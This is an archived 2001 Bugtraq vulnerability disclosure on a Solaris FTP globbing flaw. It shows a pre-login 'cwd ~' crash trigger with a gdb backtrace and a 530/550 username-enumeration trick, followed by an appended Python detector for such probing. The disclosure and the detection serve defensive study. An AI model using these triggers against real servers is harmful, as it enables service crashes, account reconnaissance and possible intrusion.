Date: Wed, 11 Apr 2001 17:50:39 +0200
From: Johnny Cyberpunk <johncybpk@GMX.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !

Hi,

I've tested this globbing vulnerability on two different SPARC Solaris machines, one with 5.6 and one with 5.7. I started Netcat from a Win2K box to port 21.

    C:\>nc 10.64.224.3 21
    220 gsmms0 FTP server (SunOS 5.6) ready.
    cwd ~
    530 Please login with USER and PASS.
    C:\>

As you can see, without being logged on, I'm landing on the prompt again after sending the cwd ~ command. Then I connected via SSH to my Solaris box and saw a fresh core file created in /. Then I started:

    gdb /usr/sbin/in.ftpd /core

which gives me the following information:

    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.7"...
    (no debugging symbols found)...
    Core was generated by `in.ftpd'.
    Program terminated with signal 11, Segmentation Fault.
    Reading symbols from /usr/lib/libcmd.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libbsm.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done.
    Reading symbols from /usr/platform/SUNW,Ultra-250/lib/libc_psr.so.1...
    (no debugging symbols found)...done.
    #0  0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1
    (gdb) bt
    #0  0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1
    #1  0x1648c in glob ()
    #2  0x162e8 in glob ()
    #3  0x161d4 in glob ()
    #4  0x19884 in yyparse ()
    #5  0x13a90 in main ()
    (gdb)

As you see, a segmentation fault has happened. After that I typed in the bt command to get more info about the segmentation fault. At offset 0xff1b6dd0 the strcpy() command failed and produced the segmentation fault. This problem could allow an attacker to execute code on the stack and gain access to the system.

Another nice effect is the following:

    C:\>nc 10.64.224.3 21
    220 gsmms0 FTP server (SunOS 5.6) ready.
    cwd ~netadm
    530 Please login with USER and PASS.
    cwd ~xyz
    530 Please login with USER and PASS.
    550 Unknown user name after ~

As you see, cwd ~netadm just produces a normal 530 message, because this user exists on the system. The user xyz doesn't exist and prints out a 550 Unknown user name after ~. This could be used to brute force existing users on the remote system.

I saw the same effects on a SPARC Solaris 5.7 box.

When I have some more time available I'll write proof of concept code to exploit this vulnerability, that executes a /bin/sh on the stack.

cheers
Johnny Cyberpunk ( Johnny.Cyberpunk@illegalaccess.org )
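Added example, not part of the original post: a log detector for the pre-login "cwd ~user" probing described above, run over a constructed session transcript. The transcript format (one line per client command or server reply) and the client addresses are assumptions, not Solaris in.ftpd's own log format; the reply texts mirror the ones quoted in the post.

```python
"""Detect pre-auth 'CWD ~user' probing in FTP session logs (constructed
format, not Solaris in.ftpd's own): <time> <client-ip> C>|S> <text>."""
import re
from collections import defaultdict

# Constructed sample: .99 probes home dirs before login; .50 logs in first.
SAMPLE_LOG = """\
2001-04-11T17:50:39 10.64.224.99 C> CWD ~netadm
2001-04-11T17:50:39 10.64.224.99 S> 530 Please login with USER and PASS.
2001-04-11T17:50:40 10.64.224.99 C> CWD ~xyz
2001-04-11T17:50:40 10.64.224.99 S> 530 Please login with USER and PASS.
2001-04-11T17:50:40 10.64.224.99 S> 550 Unknown user name after ~
2001-04-11T17:50:41 10.64.224.99 C> CWD ~root
2001-04-11T17:50:41 10.64.224.99 S> 530 Please login with USER and PASS.
2001-04-11T17:51:02 10.64.224.50 C> USER alice
2001-04-11T17:51:03 10.64.224.50 S> 230 User alice logged in.
2001-04-11T17:51:05 10.64.224.50 C> CWD ~alice
2001-04-11T17:51:05 10.64.224.50 S> 250 CWD command successful.
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (C>|S>) (.*)$")
CWD_TILDE_RE = re.compile(r"^CWD\s+~([^/\s]*)", re.IGNORECASE)

def find_preauth_home_probes(log_text):
    """Per client: names probed via CWD ~ before any 230 login, and those
    the server answered with 550 (i.e. the account does not exist)."""
    authed = set()      # clients that completed a login
    last_probe = {}     # client -> name in its most recent CWD ~ command
    probes = defaultdict(lambda: {"probed": [], "unknown": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue    # skip lines that do not fit the assumed format
        _, ip, direction, text = m.groups()
        if direction == "S>":
            if text.startswith("230"):
                authed.add(ip)
            elif text.startswith("550") and ip in last_probe:
                probes[ip]["unknown"].append(last_probe.pop(ip))
        elif ip not in authed:
            cwd = CWD_TILDE_RE.match(text)
            if cwd:
                probes[ip]["probed"].append(cwd.group(1))
                last_probe[ip] = cwd.group(1)
            else:
                last_probe.pop(ip, None)  # a later 550 is not a probe reply
    return dict(probes)

def flag_enumeration(log_text, threshold=3):
    """Client IPs whose distinct pre-auth home probes reach the threshold."""
    return sorted(ip for ip, p in find_preauth_home_probes(log_text).items()
                  if len(set(p["probed"])) >= threshold)
```

The same 530-then-550 differential is the signal on the server side: a patched ftpd should answer every pre-login CWD with the same 530 reply, so the "unknown" list stays empty once the fix is in.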